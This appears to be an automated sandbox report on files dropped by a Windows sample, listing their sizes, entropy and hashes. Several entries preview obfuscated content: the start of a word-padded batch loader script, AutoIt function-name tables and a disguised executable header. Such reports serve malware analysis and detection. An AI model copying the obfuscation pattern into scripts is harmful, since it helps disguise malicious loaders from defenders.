                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):144384
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.428760646916047
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:tg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjT:+5vPeDkjGgQaE/loUDtf0aT
                                                                                                                                                                                                                                                                                                                          MD5:2861D2191BE9129896DED87A878F5B77
                                                                                                                                                                                                                                                                                                                          SHA1:980D1B99470153AA3234A567B325E9F15B0CD992
                                                                                                                                                                                                                                                                                                                          SHA-256:D09B42E95A81CD53FD9A92D02B90A860EECA3689DBF60D6BB8B8635EE211A3D6
                                                                                                                                                                                                                                                                                                                          SHA-512:649638A5FE5D4AEBA6C7839E69CA6F4DA62C6D2C50353090107965406461002DF4CF0AC6F9F724F4EAFD457CFBA46CDD8832F2D46B6F2C40ADB2F8853DCFAD47
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):36171
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.16471519792697
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:j9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:jATGODv7xvTphAiPChgZ2kOE6
                                                                                                                                                                                                                                                                                                                          MD5:7486F9EDAA976A7868F819999DF1C9D7
                                                                                                                                                                                                                                                                                                                          SHA1:10545811B18674116897AA012DCE5EAD49EB5309
                                                                                                                                                                                                                                                                                                                          SHA-256:84CA0B3B99DB65A0FBCFD91EABAA2451E3C0FFB0D3D62684B29A7181ADD199D4
                                                                                                                                                                                                                                                                                                                          SHA-512:2CB0C18B8F3951F53BC2C0AFE27ADEA4FFFD59F6651D78CD86B6AB2CA188874E1C9EC1739AB67B1C076FB1AFD61B39A810F9C8B452F470B9DF6D21519078C83D
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):67584
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.635525743882745
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:vOWel3EYr8qcDP8WBosd0bHazf0Tye4Ur2+9BGmp:v5el3EYrDWyu0uZo2+9BGmp
                                                                                                                                                                                                                                                                                                                          MD5:12C3312A37DAF85CF239DD6C6859404A
                                                                                                                                                                                                                                                                                                                          SHA1:5E95C3119DF592998EB7CA3ECF51C5D7BF0A204E
                                                                                                                                                                                                                                                                                                                          SHA-256:5ED889966EFF12BD9DA9F7DFCA7726914AA626B462183A095AA743ED4B55EFD3
                                                                                                                                                                                                                                                                                                                          SHA-512:3E53EDC94193615AEAF2044652E8DD6C6104B6F1271A47C09D49ED3A9420310DC8B70D25B3CE7187DB53003B0D38131FA6FC033E7472988579D7A027237E7D0B
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):138240
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.676637956212875
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:5HSBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmES/:mNPj0nEo3tb2j6AUkB0CThp6/
                                                                                                                                                                                                                                                                                                                          MD5:08E1606ECBD59D925F046701CF5ECD20
                                                                                                                                                                                                                                                                                                                          SHA1:440BE507E8AA8F0E1607BA86CCE81C73EA6CEBAD
                                                                                                                                                                                                                                                                                                                          SHA-256:349442C096FBB8A42C898013D1304F128D4AA46F3E7BC923BAB4F7A7E6DF6DBC
                                                                                                                                                                                                                                                                                                                          SHA-512:4485E2C7550AFE312469BCF1C7863B5F3EAE0DDA3BADDAB96EFDEAE36F58177FA732A2422712A72FF6906D16203241B43A56E2FD39AC431A4E7E7148315DE4DA
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):97280
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.997961561974799
                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:49e7DQ2rPs9o5a+x6JtveJQS2Ke+pKuZ8z9Vz+sflr5jiYgyM4G5jpVw/A6idEQN:RDiy5foJZ8yCSzD64G5FVwImBxMCrs
                                                                                                                                                                                                                                                                                                                          MD5:5EE523C0ED945076A9BEC5072C038A9E
                                                                                                                                                                                                                                                                                                                          SHA1:8581B16521B077F2B96D415DCC9F05DCAAC9A895
                                                                                                                                                                                                                                                                                                                          SHA-256:12122BB97FA16FF6C61E79C03C94FB922214C0D6CCD0FA906DA2CADB2E55C6A9
                                                                                                                                                                                                                                                                                                                          SHA-512:88D1A1841EA5075E5C54492316A76AD1507EB4E92FF3402B48FC755B6E371772DFCB2401D1C14C692BA8F6A0E968D32F22104A98E6637A9084289A125FAC2DF1
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):63488
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.571938928420122
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:Hn+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMm3:H+AqVnBypIbv18mLthfhnueoMm3
                                                                                                                                                                                                                                                                                                                          MD5:CDABA79081FA6D641A98A3E9973CFB8C
                                                                                                                                                                                                                                                                                                                          SHA1:ADC52FE9CB7CA8ED553A22A54E3B3317FBD84347
                                                                                                                                                                                                                                                                                                                          SHA-256:A495934AC794C9B92F16BF2DBC45C2291D36C1B2187A18C4E9CB1842308831F6
                                                                                                                                                                                                                                                                                                                          SHA-512:47D7894955153F23D73A5DD1D8E8F9265822C74F15495271642E83AC7D6191261FF9F6853926CC5749DB91B758BD5A568985CDB6A1185D9E6601F4E31F28FED9
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:DOS executable (COM)
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):94208
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.603392667759479
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:G8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyRXzW8/uC6LdTR:G80PtCZEMnVIPPBxT/sZydTmRxlHS3NX
                                                                                                                                                                                                                                                                                                                          MD5:BE7A18D476261EB3209931818C38C42A
                                                                                                                                                                                                                                                                                                                          SHA1:D097C4E1E31F858ACC8D6E67BDA2942690FDCE7B
                                                                                                                                                                                                                                                                                                                          SHA-256:BF51600F92C483C8FBB600F73D161662AA6FD932AD0EA8F054489C4788DECE93
                                                                                                                                                                                                                                                                                                                          SHA-512:C62F36D5862A5B2A766A60E1EC3E98BCF0DA64D7AA9634EA8A63C05EDE72290F6D46CE2642BA0C433981F8D1FC8901BFC5E2C878074AA1F493521FC05DDA58F3
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (337), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):8408
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.218294245961915
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:A3ZvggKNfAZX6bSx7KdsdHvMYK6yOL1DAgLeu2RoLOA3LSN8qXxBg:2CjNfuX6bfYCm1heuzL72N8qX7g
                                                                                                                                                                                                                                                                                                                          MD5:22713AB537083D5651E134AD4CB6E091
                                                                                                                                                                                                                                                                                                                          SHA1:665E1D44797B85F17AC267B94B519349CDCC553F
                                                                                                                                                                                                                                                                                                                          SHA-256:B55BCBE8D53825BC127D6F5032DC10D3C68674602BA7A3B1EC496011508B1953
                                                                                                                                                                                                                                                                                                                          SHA-512:DEEAB54E73EE196495F76A634B2FA7E250369EFFE617BAB25F6A6EE451F455D018AEE913E5D0A590AAEB686598921B30350AC46C1AEB132600A896DFFE8E6308
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:Set Ci=J..apCompanion-Boundaries-..zmJun-Purchased-Yea-Narrative-Ez-Appointments-..fDAPolished-Whom-Bbs-Fallen-Recipes-Cigarettes-Components-..CWSeats-Running-Sentence-Wma-Voltage-Pee-..bwwReforms-Jr-Differently-Strings-Individual-Administrators-Premium-Ya-Section-..DNvBloggers-Tel-Informed-Variety-..pWKWCriticism-Search-Filme-Been-Secretariat-Skirts-Burner-Jane-Parish-..Set Saves=F..MBXhLose-Congressional-..FWbDR-Batman-Mls-Directories-..fyEngine-Circle-Salt-Answers-Candle-Searching-..CcxrSupporting-Different-Companies-Schedule-Keyboards-Wagon-Dsc-Bother-..ptKSonic-Observe-Cleveland-Represented-Really-Meals-..advzCrew-Adjustments-..kllCRally-Invision-Interface-Threatening-..Set Jack=c..nBBCop-..vvjRec-Animal-Uni-Say-Visitors-..CzXNv-Mexican-..SVLottery-Cleveland-Writers-Pin-Couple-Adopted-Survey-Mauritius-..FKCase-Latin-Acquired-..IEgProducts-Starting-Machine-Protect-Stud-Website-..Set Selected=Z..hNLawsuit-Oscar-Junior-..IzEffectiveness-..axConstraint-Patents-Hl-Although-..VKpMac-Roc
                                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (337), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):8408
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.218294245961915
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:A3ZvggKNfAZX6bSx7KdsdHvMYK6yOL1DAgLeu2RoLOA3LSN8qXxBg:2CjNfuX6bfYCm1heuzL72N8qX7g
                                                                                                                                                                                                                                                                                                                          MD5:22713AB537083D5651E134AD4CB6E091
                                                                                                                                                                                                                                                                                                                          SHA1:665E1D44797B85F17AC267B94B519349CDCC553F
                                                                                                                                                                                                                                                                                                                          SHA-256:B55BCBE8D53825BC127D6F5032DC10D3C68674602BA7A3B1EC496011508B1953
                                                                                                                                                                                                                                                                                                                          SHA-512:DEEAB54E73EE196495F76A634B2FA7E250369EFFE617BAB25F6A6EE451F455D018AEE913E5D0A590AAEB686598921B30350AC46C1AEB132600A896DFFE8E6308
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:Set Ci=J..apCompanion-Boundaries-..zmJun-Purchased-Yea-Narrative-Ez-Appointments-..fDAPolished-Whom-Bbs-Fallen-Recipes-Cigarettes-Components-..CWSeats-Running-Sentence-Wma-Voltage-Pee-..bwwReforms-Jr-Differently-Strings-Individual-Administrators-Premium-Ya-Section-..DNvBloggers-Tel-Informed-Variety-..pWKWCriticism-Search-Filme-Been-Secretariat-Skirts-Burner-Jane-Parish-..Set Saves=F..MBXhLose-Congressional-..FWbDR-Batman-Mls-Directories-..fyEngine-Circle-Salt-Answers-Candle-Searching-..CcxrSupporting-Different-Companies-Schedule-Keyboards-Wagon-Dsc-Bother-..ptKSonic-Observe-Cleveland-Represented-Really-Meals-..advzCrew-Adjustments-..kllCRally-Invision-Interface-Threatening-..Set Jack=c..nBBCop-..vvjRec-Animal-Uni-Say-Visitors-..CzXNv-Mexican-..SVLottery-Cleveland-Writers-Pin-Couple-Adopted-Survey-Mauritius-..FKCase-Latin-Acquired-..IEgProducts-Starting-Machine-Protect-Stud-Website-..Set Selected=Z..hNLawsuit-Oscar-Junior-..IzEffectiveness-..axConstraint-Patents-Hl-Although-..VKpMac-Roc
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):13429
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.986025434136987
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:+rev893Dxu9kKTljitPIYARQONiBQ/TU5scx:ZU9zx6jljitPARpAiUP
                                                                                                                                                                                                                                                                                                                          MD5:35AB97965ED21C93B90FB8236A2DE026
                                                                                                                                                                                                                                                                                                                          SHA1:619AD50307AE8E141E0911E4C1656931C94A0505
                                                                                                                                                                                                                                                                                                                          SHA-256:390A2909C28C2C8A5A9269905C2500EB93C069F3A3F9E663770FC452A877E26F
                                                                                                                                                                                                                                                                                                                          SHA-512:A1522F80DA3E6682F8DCEF9D0B4D1F0C3768E63E5F623C8087B1C017F74391A6C819C6EE4885C3656BB5BD6DBB24E4A8BD2EC2A6321ECA93F5A872A864DFD6ED
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.8659894634372165
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:ugRHM1zzhWE7QxZaR8gpJsWVycd0vq6LqgaHbdMNkNDUzSLKPDvFQC7Vkr50:fh6R8anHsWccd0vtmgMbFuz08Qukl0
                                                                                                                                                                                                                                                                                                                          MD5:E95592BE5A986764EF4BCD3D2279610D
                                                                                                                                                                                                                                                                                                                          SHA1:C5412DE07D209E2F540934A526E4A0DFDE743EF4
                                                                                                                                                                                                                                                                                                                          SHA-256:40EAC969BE23708C454170332FFB682FAE4667FA161580F6A50620BFB3F1E82C
                                                                                                                                                                                                                                                                                                                          SHA-512:33896D5EAB2081CD7F33EBD7D355BC73476A05FE2CC40904167BEF3AB6C3FC01671AF1D38F55AADC868D02523808865154C7A7C7A720F78D47DC3CC642BB18CF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.S.E.T.H.E.L.P.....F.I.L.E.G.E.T.P.O.S.....I.S.D.E.C.L.A.R.E.D.....T.C.P.C.O.N.N.E.C.T.....B.L.O.C.K.I.N.P.U.T.....S.T.D.E.R.R.R.E.A.D.....W.I.N.G.E.T.T.E.X.T.....M.O.U.S.E.W.H.E.E.L.....G.U.I.S.E.T.F.O.N.T.....S.T.R.I.N.G.L.E.F.T.....M.O.U.S.E.C.L.I.C.K.....T.R.A.Y.G.E.T.M.S.G.....G.U.I.S.E.T.I.C.O.N.....U.D.P.S.T.A.R.T.U.P.....S.T.D.O.U.T.R.E.A.D.....M.A.P.A.P.P.E.N.D...G.U.I.C.R.E.A.T.E...M.A.P.E.X.I.S.T.S...W.I.N.A.C.T.I.V.E...I.N.E.T.C.L.O.S.E...T.I.M.E.R.D.I.F.F...F.I.L.E.F.L.U.S.H...R.U.N.A.S.W.A.I.T...G.U.I.S.W.I.T.C.H...D.I.R.C.R.E.A.T.E...W.I.N.G.E.T.P.O.S...B.I.T.R.O.T.A.T.E...F.I.L.E.W.R.I.T.E...I.S.K.E.Y.W.O.R.D...G.U.I.G.E.T.M.S.G...S.T.R.I.N.G.M.I.D...O.B.J.C.R.E.A.T.E...M.O.U.S.E.M.O.V.E...T.C.P.L.I.S.T.E.N...G.U.I.D.E.L.E.T.E...B.I.N.A.R.Y.M.I.D...W.I.N.E.X.I.S.T.S...S.O.U.N.D.P.L.A.Y...M.O.U.S.E.D.O.W.N...M.A.P.R.E.M.O.V.E...F.I.L.E.C.L.O.S.E...B.I.N.A.R.Y.L.E.N...E.N.V.U.P.D.A.T.E...D.I.R.R.E.M.O.V.E...R.E.G.D.E.L.E.T.E...S.T.R.I.N.G.L.E.N...I.N.I.D.E.L.E.T.E...T.C.P
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):94208
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998364588537466
                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:TQBIh0esmdr8TrSMjWohuSVpBpZ+1bcmmnYmgkNuAOB3vwGpowCxsnFfIroqu3ak:vh0eVr87ju8jpZW4mm2ouYGBCO+opqk
                                                                                                                                                                                                                                                                                                                          MD5:796CFAF0CEDB049BCA9B24E809EC0100
                                                                                                                                                                                                                                                                                                                          SHA1:8F919FE33168F0972FFE9F2C3290132DB321C1AF
                                                                                                                                                                                                                                                                                                                          SHA-256:1C3CEBBAB1616C3AF60D6A4729D0016192E1AA75FEA4A226CFDCCBB5EBE1A4B8
                                                                                                                                                                                                                                                                                                                          SHA-512:A857F807DFA3959ABC6E151BE7A20A86EA0A787AABBD4646B7F13F69CDC973C5EE92646DECF88356AC21A1F2EB086BF821961C141A6206E9E7966FCDFA7BF38A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):67584
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5584423398312826
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:fKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:fKaj6iTcPAsAhxjgarB
                                                                                                                                                                                                                                                                                                                          MD5:861134FB36383C179CB03764F2CD12C8
                                                                                                                                                                                                                                                                                                                          SHA1:C6D2501212DA26C1F41A3FA8947EF2B7E4F28A47
                                                                                                                                                                                                                                                                                                                          SHA-256:F67E02B20EF188D69AC2EE61E93298D01D62A92EC7463897283782E0B3B79794
                                                                                                                                                                                                                                                                                                                          SHA-512:4F931B585CE1993D6439C9B9E1065EFF2555499E527BB1740133B07E0498A18FBB0FEB62A7B53BC5287C225E8CD8249D86AB51FA3E19A39C8106D2EA7D06DA1D
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):81920
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.3980529493969165
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:+rrHL/uDoiouK+r5bLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfG:+qDoioO5bLezW9FfTut/Dde6u640ewy3
                                                                                                                                                                                                                                                                                                                          MD5:23DFC4CD924335264B4D6BB3844054FC
                                                                                                                                                                                                                                                                                                                          SHA1:F98112A81720C100737DCE6CFD5DFADE4098D424
                                                                                                                                                                                                                                                                                                                          SHA-256:7955120BAD73F2CDFCEAFE16739E3CC80D4BD69011FBB8919CE932DEB523483D
                                                                                                                                                                                                                                                                                                                          SHA-512:379BEF7B3A711DE3A943C30130AA9AB7534E9CBD7C9929E29AACD76CD194EB0A2B542BBB41B5E9095CB355605516CBC4585F4161B1744151CAB27C028923097E
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):89088
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9981467332246
                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:UFUqeOY/S/PwYG+JLkMhPaR1cJKUWOIRIrZsfh6i/W9gUU+GmBeKlHcAeqLmk:G3iwoYG+Rjc+ku6fBbX0egH7Lmk
                                                                                                                                                                                                                                                                                                                          MD5:7B94AB97BEFB9AB968A7DB298D98892D
                                                                                                                                                                                                                                                                                                                          SHA1:5D21AEE41F5F3EC7B54D4C60315FFFE0C6FD4FF0
                                                                                                                                                                                                                                                                                                                          SHA-256:EF44E8D7076638218844F0E7AA379E972EFEA1B4E32999A3981696752FD26DD0
                                                                                                                                                                                                                                                                                                                          SHA-512:4BA84CE4CC80948147685ED098042F21C962714F6F4ECE8BD099077898470F1C10DBCC3D7EEEC84CDBBEBE00E37D64390105652D60976029AD51807CCD0AC213
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):124928
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.692375664403762
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:wcBiqXvpgF4qv+32eOyKODOSpQSAU4CE0ImbT:wcB3gBmmLsiS+SAhClbT
                                                                                                                                                                                                                                                                                                                          MD5:1A086A7F4690C073C0BC3E71EA9C5F22
                                                                                                                                                                                                                                                                                                                          SHA1:2E52D452CBA7BBB3BAD7163E5C6197F86CC8D2B2
                                                                                                                                                                                                                                                                                                                          SHA-256:A25BC1EDC42946646E106FF320E0359AE502BD5C45BAEDEFA11B9FCDA14454BB
                                                                                                                                                                                                                                                                                                                          SHA-512:413FDBD805125B01F2B37703B8BA58960051E9E7F7EA48514FBD69E4B27BC0F56682C36F0BAF649FFD4F7788B3538730C7303FE8D42F9EB60BF0B70FA6D71686
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):74752
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.454851984923921
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:N4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/SO:NBNIimuzaAwusP9
                                                                                                                                                                                                                                                                                                                          MD5:96917B2112CBC674CB3757A5F2361CEF
                                                                                                                                                                                                                                                                                                                          SHA1:3461C7E64CD646EBA1767E8381CC148D533DEE6E
                                                                                                                                                                                                                                                                                                                          SHA-256:1C9E9F68AB8585088F3A0122EADC0736BA6EE6A0491FB3B2C6603B94325FBF37
                                                                                                                                                                                                                                                                                                                          SHA-512:87AA165A775C67DC7F8C4C5AB6029ED9C53133ADACB17C60FEDC29501F772EF0C917B98056772AECD77DE3BC02129D2FB3E706AD09BB1262BC282EBA9AB19DF0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):79872
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.99780917309395
                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:lk17AUhxNAJ1C2odypDXpg3yDYpLkvxTGzxMIhn40kiHTg01td2TMDvjCY:lk1r3UCzUp3D8LkvNGzxMIJ4viHM4fDZ
                                                                                                                                                                                                                                                                                                                          MD5:EE597F46D7E12C109A5F91C5B267754F
                                                                                                                                                                                                                                                                                                                          SHA1:B363C08BF46085CBAA2D75DCA46B7614250DC387
                                                                                                                                                                                                                                                                                                                          SHA-256:794C00137BE916FFFB54A35168339E4805DDBC73603EFAFEC1DC051B1983553A
                                                                                                                                                                                                                                                                                                                          SHA-512:7D5E06712F4CF040E671C9E574F4BA92D59D12226AC8CCCB080E9A19723D0DE91A5F16F31775367CEDBB11492E51A90E4271D7A12B6539564FAD235988D9F95C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2835
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4808049361591396
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:R59n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+MAyKnFHbgu:FSEA5O5W+MfH5S1CqlVJcI6mlbT
                                                                                                                                                                                                                                                                                                                          MD5:ADE1699758D1C7E3C92058DD41A6FF77
                                                                                                                                                                                                                                                                                                                          SHA1:E6EC211A293CA67BDFBED0DCB00956D0E85AB236
                                                                                                                                                                                                                                                                                                                          SHA-256:E27368DFBE3E822BA12F83CD62607A358BA4BD19383F2679B1C7F4E349E0964A
                                                                                                                                                                                                                                                                                                                          SHA-512:C36C0205A66AB26A06DE07B2243012CD25FBE0A6DEECE01F203657851807EBC2FEC2F93B2C8330397A88CFBD51C353EFE665708D813DDC21E4946BBD2FF7442F
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SYDNEY........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2110
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.398202992485528
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rr4:8e2Fa116uCntc5toYctBD/UM
                                                                                                                                                                                                                                                                                                                          MD5:72D3579399974B58467027C6653BDAF4
                                                                                                                                                                                                                                                                                                                          SHA1:8C83ECCE075C50047512FFCC6E87A17BF0AFE52E
                                                                                                                                                                                                                                                                                                                          SHA-256:2FAAD0C2AFDD1FF696279391DF8F416338E706BCD8ADFFD69096C56FBC79114B
                                                                                                                                                                                                                                                                                                                          SHA-512:774A700B308F202910B368EC89E0F2C8AEE3D430A22E9D271304974D370804E345DA158FBCFED2B2480F81ADDA61F2A2C4DE9CF86E8A736CD5B749BD0DE196C3
                                                                                                                                                                                                                                                                                                                          Malicious:false
